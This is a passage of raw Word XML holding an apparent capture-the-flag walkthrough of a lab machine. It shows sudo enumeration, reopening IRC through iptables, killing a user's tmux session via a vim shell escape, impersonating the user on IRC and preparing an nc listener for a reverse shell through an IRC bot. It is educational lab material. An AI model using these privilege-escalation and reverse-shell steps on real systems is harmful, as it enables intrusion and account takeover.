    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="1914525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16" name="Picture 16" descr="WN - PHP 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N - PHP Shel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PHP shell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By just looking at the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> information above I found that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>waldo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> doesn’t need password for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on a specific file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF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No password for managing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was required</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> deserved some investigation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="1133475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15" name="Picture 15" descr="WN - Looking at Ip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N - Looking at Iptabl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Looking at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rules </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>The current rule was that all external connections to IRC was to be dropped. I decided to make the IRC server more open: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6651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 xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w: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iptables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> -R INPUT 2 -p </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>dport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> 6667 -j ACCEPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>The above command rewrote the second rule to allow TCP connections on port 6667, as seen in the following screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture 14" descr="WN - Iptables enabling I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N - Iptables enabling IR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Enabling IRC connections </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Messing with IRC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With the IRC service opened I used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IRSSI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to connect to the service and for issuing the following commands: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2571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  <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
            <w:r>
              <w:t>3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>/server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192.168.110.11</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/list</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/j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wallabyschat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="2924175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13" name="Picture 13" descr="WN - Connect I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N - Connect IR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IRC connection </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inside the channel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wallabyschat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I saw two other users:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12" name="Picture 12" descr="WN - Inside Wallabyschat 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N - Inside Wallabyschat channe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Inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wallabyschat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Going back to main window in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IRSSI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I did some reconnaissance on the users by using the following commands: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2091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  <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
            <w:r>
              <w:t>2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whois</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w: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waldo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF"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whois</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w: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wallabysbot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="WN - IRC Who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N - IRC Whoi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IRC WHOIS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wallabysbot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is based on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sopel</w:t>
      </w:r>
      <w:r>
        <w:t>. Looking for this bot framework on the server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="5362575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="10" name="Picture 10" descr="WN - LS all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N - LS all user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Listing some directories </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sopel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was found in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wallabys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> home folder and there was just one module available, a typical </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="3219450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="WN - Finding So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N - Finding Sope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Finding Sopel </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The script stated you had to be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Waldo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run this script. I tried to execute it in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IRSSI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with this outcome:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 8" descr="WN - Sopel run sc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N - Sopel run scip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IRC fail </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Backtracking some steps I recalled finding a script called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>irssi.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>waldos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> home folder. I looked into it in hope of finding something of interest:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="7" name="Picture 7" descr="WN - Waldo IRSSI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N - Waldo IRSSI scrip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IRC script </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I found that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Waldo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for his </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> needs. There’s a hitch in his setup. If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> went down, so would his IRC connection. Backtracking some more I found that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Waldo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can edit a specific Apache file using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has got a neat feature that let you run commands. I penned a plan to kill his </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session using said feature in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. But first I had to find the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> process ID:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="314325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6" name="Picture 6" descr="WN - who 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N - who cm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Finding process ID </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Then I had to extend my shell so I could use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vim</w:t>
      </w:r>
      <w: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5641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 xml:space="preserve">$ python -c 'import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>pty;pty.spawn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>("/bin/bash")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="266700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="WN - Python mag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N - Python magic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Python magic </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Opening </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vim</w:t>
      </w:r>
      <w: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8501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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>sudo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 xml:space="preserve">-u </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>waldo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/bin/vim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etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/apache2/sites-available/000-default.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then issuing kill command using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vim</w:t>
      </w:r>
      <w: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2691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>[ESC]:!kill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817 [ENTER]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="742950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="WN - VIM Kill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N - VIM Kill proces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Killing process </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Waldos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IRC connection died:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="962025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="3" name="Picture 3" descr="WN - IRC take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N - IRC takeov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IRC takeover </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then I took over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Waldos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> identity by just changing my nick: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1250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>/nick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waldo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Next step was to trick the bot to open a reverse shell hoping it would be running as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>waldo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>. First I had to set up yet another listener locally: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1610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 xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>nc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-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>lvp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8989</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then I opened a reverse connection by using </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>this gem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> in the .run command: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6891"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3BEF">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
